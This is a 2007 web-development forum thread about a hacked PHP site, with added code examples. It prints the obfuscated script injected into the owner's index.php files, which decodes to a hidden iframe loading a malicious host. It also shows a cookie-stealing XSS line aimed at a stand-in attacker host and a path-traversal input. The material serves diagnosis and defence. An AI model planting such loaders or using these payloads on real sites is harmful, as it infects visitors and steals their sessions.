
Hacked but can't figure out how

Discussion in 'Web Design & Development' started by aewarnick, Jul 18, 2007.

Thread Status:
Not open for further replies.
  1. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    My site was hacked by some guy in Russia.
    He was able to write code to the bottom of all the index.php pages on my site.

    There was at least one place that I didn't parse input data to convert html code to safe code. The reason I didn't is because the data was shown only in a textbox and never seemed to be executed.

    The reason I can't figure out how I was hacked is that when I do:

    $s="echo 'hi';";
    echo $s;

    Just outputs:
    echo 'hi';

    The only way I can see that working is if I write the data they sent to a php file and then executed that php file. Am I right?
     
  2. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    What is the code that receives the data in that "one place"?

    The only way that would work would be:
    PHP:
    <?php
    $s = "echo 'hi';";
    eval($s);
    ?>
     
  3. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I didn't know about eval, so I would have never used it in my code.

    So this is completely safe then:
    PHP:
    <?php $data = "anything a hacker would try to hack my site with."; ?>
    <textarea name="userData"><?=$data;?></textarea>
    I shouldn't say completely safe because they can `</textarea>` and then do anything they want client side, but at least the server will be safe. So in this case, I would strip out the HTML tags and then it's perfectly safe both server side and client side.
     
  4. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    Safe from what? :confused:

    What you are doing is the same as:

    <textarea name="userData">anything a hacker would try to hack my site with.</textarea>

    Only if you do something with the user input does it become unsafe.

    =-----=

    FYI, the semicolon is unnecessary because it's at the end of the code block.

    The same rule applies for CSS:

    *
    {
    color: blue;
    font-size: 50px <<no semicolon necessary here
    }
     
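    The exchange above (raw echo into a textarea is harmless for the server, but a visitor's browser will happily honour a `</textarea>` typed by the submitter) as an added example, not code from the thread. It puts the unescaped render next to an escaped one; the attacker string and the `breaksOut()` check are constructed for the demonstration.

    ```php
    <?php
    // Added example, not code from the thread. The raw echo from the contact form
    // sits next to an escaped version; the server never executes $data in either,
    // the difference is what the visitor's browser is asked to parse.

    // Constructed attacker input: closes the textarea, runs script, reopens the
    // textarea so the rest of the page still renders and nothing looks wrong.
    $userData = "hi</textarea><script>document.location='http://attacker.invalid/?c='+document.cookie</script><textarea>";

    // What the original form did: user text is spliced into the markup as-is.
    function renderUnsafe(string $data): string
    {
        return '<textarea name="userData">' . $data . '</textarea>';
    }

    // Fix: encode the HTML metacharacters so the browser shows them as text and
    // the closing tag the attacker typed never becomes a real tag.
    function renderSafe(string $data): string
    {
        $escaped = htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        return '<textarea name="userData">' . $escaped . '</textarea>';
    }

    // True when the fragment contains more than one closing tag, i.e. the user's
    // text escaped the textarea element and the browser will treat it as markup.
    function breaksOut(string $html): bool
    {
        return substr_count(strtolower($html), '</textarea>') > 1;
    }

    echo renderUnsafe($userData), "\n";
    var_dump(breaksOut(renderUnsafe($userData)));

    echo renderSafe($userData), "\n";
    var_dump(breaksOut(renderSafe($userData)));
    ```

    Escaping, not stripping, is the right primitive here: `strip_tags()` deletes text rather than encoding it (the PHP manual warns that partial or broken tags can remove more than expected), and it does nothing for other output contexts such as attribute values. `htmlspecialchars()` leaves the submitter's text intact and readable inside the box.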
  5. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I thought it would be understood that,
    "anything a hacker would try to hack my site with"
    represents code that a user would put into the textbox attempting to hack my site.

    About the semicolons, thanks, that will save the parser some time.
     
  6. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    This was written to the bottom of all my index.php files:
    PHP:
    <!-- o65 --><Script Language='Javascript'>
    <!--
    document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%67%70%74%2D%70%61%6C%2E%63%6F%6D%2F%73%63%72%69%70%74%73%2F%74%65%6D%70%6C%61%74%65%73%2F%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'));
    //-->
    </Script><!-- c65 -->
    If anyone has a program to decipher what that is in plain text, it would be a big help in determining how much they know.
     
  7. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    There is some misunderstanding between us.

    There has to be some php code that deals with user input. Can you post that code?

    It would be something like:
    PHP:
    echo $_POST['userinput'];
    The javascript you posted just makes a call to another site:
    HTML:
    <html>
    <iframe src=http://www.gpt-pal.com/scripts/templates/ frameborder="0" width="1" height="1" scrolling="no" name=counter>
    </iframe></html>
     
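    Decoding the injected block without ever loading the attacker's page, as an added example that is not code from the thread. It finds the `<!-- oNN --> ... <!-- cNN -->` marker pair from post #6 in file contents, decodes every `unescape('...')` literal offline and pulls out the iframe target, then strips the block. `$sampleFile` is constructed here to stand in for a real index.php; nothing is fetched or executed.

    ```php
    <?php
    // Added example, not code from the thread. Decodes the injected script from
    // post #6 with no browser and no JavaScript engine, so the attacker's page is
    // never loaded. $sampleFile is a constructed stand-in for an infected index.php.

    $sampleFile = "<html><body>legitimate page</body></html>\n"
        . "<!-- o65 --><Script Language='Javascript'>\n<!--\n"
        . "document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D"
        . "%68%74%74%70%3A%2F%2F%77%77%77%2E%67%70%74%2D%70%61%6C%2E%63%6F%6D%2F%73%63%72%69%70%74%73%2F"
        . "%74%65%6D%70%6C%61%74%65%73%2F%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68"
        . "%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20"
        . "%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'));\n"
        . "//-->\n</Script><!-- c65 -->\n";

    // The marker pair the attacker wrapped the script in. The number is captured so
    // the opening and closing comment must carry the same value.
    function findInjectedBlocks(string $contents): array
    {
        preg_match_all('/<!-- o(\d+) -->.*?<!-- c\1 -->/s', $contents, $m);
        return $m[0];
    }

    // JavaScript unescape() accepts %XX bytes and %uXXXX UTF-16 units; handle both
    // (the %uXXXX form is converted through a numeric entity, enough for BMP code points).
    function jsUnescape(string $s): string
    {
        $s = preg_replace_callback('/%u([0-9A-Fa-f]{4})/', function (array $m): string {
            return html_entity_decode('&#x' . $m[1] . ';', ENT_QUOTES, 'UTF-8');
        }, $s);
        return rawurldecode($s);
    }

    // Every string literal handed to unescape(), decoded, without evaluating anything.
    function decodeUnescapeCalls(string $script): array
    {
        preg_match_all('/unescape\(\s*[\'"]([^\'"]*)[\'"]\s*\)/i', $script, $m);
        return array_map('jsUnescape', $m[1]);
    }

    // Where the decoded markup points: the src of each <iframe>.
    function iframeTargets(string $html): array
    {
        preg_match_all('/<iframe\b[^>]*\bsrc\s*=\s*["\']?([^\s"\'>]+)/i', $html, $m);
        return $m[1];
    }

    // Clean-up helper: the file contents with the marker blocks removed.
    function stripInjectedBlocks(string $contents): string
    {
        return preg_replace('/<!-- o(\d+) -->.*?<!-- c\1 -->\n?/s', '', $contents);
    }

    foreach (findInjectedBlocks($sampleFile) as $block) {
        foreach (decodeUnescapeCalls($block) as $decoded) {
            echo "decoded : ", $decoded, "\n";
            foreach (iframeTargets($decoded) as $target) {
                echo "iframe  : ", $target, "\n";   // the host to block, not to visit
            }
        }
    }
    echo "cleaned :\n", stripInjectedBlocks($sampleFile);
    ```

    To sweep a whole document root, feed `file_get_contents()` of each `index.php` to `findInjectedBlocks()` and only write back the output of `stripInjectedBlocks()` after reviewing what was found; the decoded iframe host goes into a blocklist or hosts file, as MMJ's later reply suggests, rather than into a browser.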
  8. cpscdave

    cpscdave

    Joined:
    Feb 25, 2004
    Messages:
    444
    doh MMJ beat me to the punch

    Just as a warning, DO NOT go to that link. I messed up when trying to decode it and executed the code. It installed a bunch of trojans on my box now. SOB!!
     
  9. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    That's impossible. What makes you think that?

    I went to all the links, and I didn't get any download prompts or anything.

    What browser are you using?

    EDIT:

    127.0.0.1 www.gpt-pal.com #[Javascript.Exploit]
    http://www.mvps.org/winhelp2002/hosts.txt
     
  10. cpscdave

    cpscdave

    Joined:
    Feb 25, 2004
    Messages:
    444
    I'm so ashamed.... but IE6.

    When I ran the code and it opened the iframe, immediately my AV started popping up with infected files in my temporary files directory.

    I was able to remove them all without too much difficulty. But still.
     
  11. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    Here is the page that allows submission of data:
    Note that I never used my ToSafeStr function before, like I do now.
    PHP:
    <?php
    ob_start();
    // begin.php is assumed to define ToSafeStr(), aFileRead(), aFileApp(),
    // MakeBrowserPath(), $public_html and $curDir, which are used below.
    include($_SERVER['DOCUMENT_ROOT']."/begin.php");

    $userName = ToSafeStr($_POST['userName']);
    //textarea data always has slashes put in data
    $userData = ToSafeStr(stripslashes($_POST['userData']));
    $f = $public_html."/ContactData/contact.txt";
    $email = aFileRead($public_html."/../email.txt");

    if($userName)
    {
        $userName = $userName.'@'.$_SERVER['REMOTE_ADDR'];
        $wrote = mail($email, "[".$userName."]", $userData);
        aFileApp($f, "[".$userName."]\n\n".$userData."\n\n\n");
        ob_clean();
        $httpPath = MakeBrowserPath($curDir."/contact.php");
        header("Refresh: 2; URL=$httpPath");
        ob_end_flush();
        if($wrote)
            echo "<center><font size='+2' color='red'>Success!!<br>Your message has been sent.<br><br>Redirecting...</font></center>";
        else
            echo "<center><font size='+2' color='red'>Error: Could not send message. Try again.</font></center>";
        exit();
    }
    else if($userData)
    {
        ob_clean(); ob_end_flush();
        echo "<font size='+2' color='red'>Error:<br>I need an <b>Identity</b>.<br><b>Push back.</b></font>";
        exit();
    }

    ob_end_flush();
    ?>

    <p>There are 2 ways to contact me:<br>
      <br>
      1. Trust me with your email address and send me an email:<br>
      &nbsp;&nbsp;&nbsp;&nbsp;<a href="mailto:<?=$email?>"><font size="-1"><?=$email?></font></a><br>
      <br>
      2. For those of you who have had your trust abused:<br>
      &nbsp;&nbsp;&nbsp;&nbsp;Use the form below.<br>
      <br>
    </p><center>
    <form name="form1" method="post" action="contact.php">
     <p>Your Identity* 
        <input type="text" name="userName" style="width:100px;">
      </p>
      <p> 
        <textarea name="userData" wrap="soft" style="width:400px;" rows="15"></textarea>
      </p>
      <p>
        <input type="submit" name="Submit" value="Submit">
      </p>
    </form></center>

    <?php
    include($public_html."/end.php");
    ?>
     
  12. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I was looking in my logs and I think I found his address:
    87.118.110.210
    It's kind of unusual how the IP address changed when the data was posted, isn't it?

    PHP:
    87.118.110.210 - - [16/Jul/2007:01:46:30 -0500] "GET /contact.php HTTP/1.1" 200 2431 "-" "-"
    67.101.84.208 - - [16/Jul/2007:01:46:34 -0500] "POST /contact.php HTTP/1.0" 200 114 "http://foryouandi.com/contact.php" "Opera/9.0 (Windows NT 5.1; U; en)"
     
  13. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    Did more digging, they are hosted here:
    ns.km23547.keymachine.de

    I think they're the ones who have been spamming me like mad too with porn links.
     
  14. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I found something else in my code this morning.

    There was a place where the user could send a GET variable that wasn't parsed to the PHP script, and my code would append it to another string that was a directory, and that directory they specified would be created.

    Could they do anything like they did just by exploiting the code of creating a directory?
     
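    The pattern described in the post above (a GET variable appended to a directory path that is then created) next to a hardened version, as an added example that is not code from the thread. The thread does not establish whether this was the attacker's way in; what the example shows is the general property of the unsafe form: each `../` in the parameter walks one level above the intended base, so the caller picks where the web server's user creates a directory. The parameter name, the base directory (placed under the system temp directory so the script runs as-is) and the sample inputs are assumptions.

    ```php
    <?php
    // Added example, not code from the thread. Reproduces the "append a GET
    // variable to a directory and mkdir() it" pattern and a hardened replacement.
    // The base directory and the inputs are constructed for the demonstration.

    $base = sys_get_temp_dir() . '/contact_dirs';

    // Vulnerable: the parameter is concatenated verbatim. Nothing stops "../"
    // segments, so the resulting path can be anywhere the PHP user may write.
    function dirPathUnsafe(string $base, string $param): string
    {
        return $base . '/' . $param;       // this is what would be handed to mkdir()
    }

    // Hardened: accept one plain name component, create it, then confirm the
    // result really lives under $base. Returns the canonical path, or null.
    function makeDirSafe(string $base, string $param): ?string
    {
        // A single component only: no separators, no dots, no NUL, bounded length.
        if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $param)) {
            return null;
        }
        if (!is_dir($base) && !mkdir($base, 0755, true)) {
            return null;
        }
        $target = $base . DIRECTORY_SEPARATOR . $param;
        if (!is_dir($target) && !mkdir($target, 0755)) {
            return null;
        }
        // Defence in depth: resolve symlinks and check the prefix against the real base.
        $realBase   = realpath($base);
        $realTarget = realpath($target);
        if ($realBase === false || $realTarget === false
            || strncmp($realTarget, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
            return null;
        }
        return $realTarget;
    }

    // Constructed inputs: one traversal attempt, one legitimate name.
    $traversal = '../../../../var/www/html/pwned';
    $normal    = 'july2007';

    echo "unsafe path: ", dirPathUnsafe($base, $traversal), "\n";
    var_dump(makeDirSafe($base, $traversal));
    var_dump(makeDirSafe($base, $normal));
    ```

    The whitelist regex alone already prevents traversal; the `realpath()` comparison is kept so that a later loosening of the regex, or a symlink planted inside the base directory, still cannot move the created directory outside it.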
  15. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
Short URL to this thread: https://techguy.org/597591